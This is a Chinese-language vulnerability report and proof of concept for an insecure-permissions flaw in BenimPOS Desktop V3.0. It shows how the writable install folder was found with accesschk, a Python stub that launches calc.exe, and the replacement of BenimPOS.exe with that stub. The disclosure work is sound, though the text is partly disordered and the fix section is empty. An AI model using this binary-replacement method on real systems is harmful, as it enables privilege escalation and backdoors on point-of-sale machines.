CVE-2025-57392
🔒 安全漏洞报告
产品:BenimPOS Desktop V3.0
漏洞类型:不安全的文件权限
受影响组件:BenimPOS.exe, unins000.exe, System.Data.SQLite.dll
漏洞分类:CWE-276:不正确的默认权限
概念验证作者:Fatih Bülbül
测试环境:Windows 11 x64 – 本地管理员 + 标准用户
🛠️ 1. 漏洞检测
首先,我使用 Sysinternals 开发的 AccessChk.exe 工具检查了 BenimPOS 应用程序安装目录的权限:
使用的命令:
accesschk.exe -dqvw "C:\Program Files (x86)\BenimPOS"
获得的结果:
RW Everyone
FILE_ALL_ACCESS
RW BUILTIN\Users
FILE_ALL_ACCESS
📌 "Everyone" 和 "BUILTIN\Users" 组被授予了 FILE_ALL_ACCESS 权限。这意味着任何标准用户都可以修改应用程序的 .exe 或 .dll 文件。
📸 以下是该输出的截图:
try:
subprocess.Popen(r"C:\Windows\System32\calc.exe")
except Exception as e:
with open("error_log.txt", "w") as f:
f.write(traceback.format_exc())
sys.exit(1)
• 我使用 PyInstaller 将此脚本转换成了 .exe 文件。
• 然后,我用这个新的可执行文件替换了原始的 BenimPOS.exe 文件。
🔁 程序启动:
• 计算器 (calc.exe) 被执行,而不是打开 BenimPOS。
📸 截图(calc.exe 启动):
🧨 3. 影响与风险
此漏洞的影响是严重的:
| 分类 | 描述 |
|---|---|
| 权限提升 | 标准用户可以模拟具有管理员权限的进程。 |
| 恶意代码注入 | 可以修改 EXE 或 DLL 文件以插入后门。 |
| 应用程序操纵 | 可更改 POS 应用程序的功能以欺骗用户。 |
🩹 4. 建议修复方案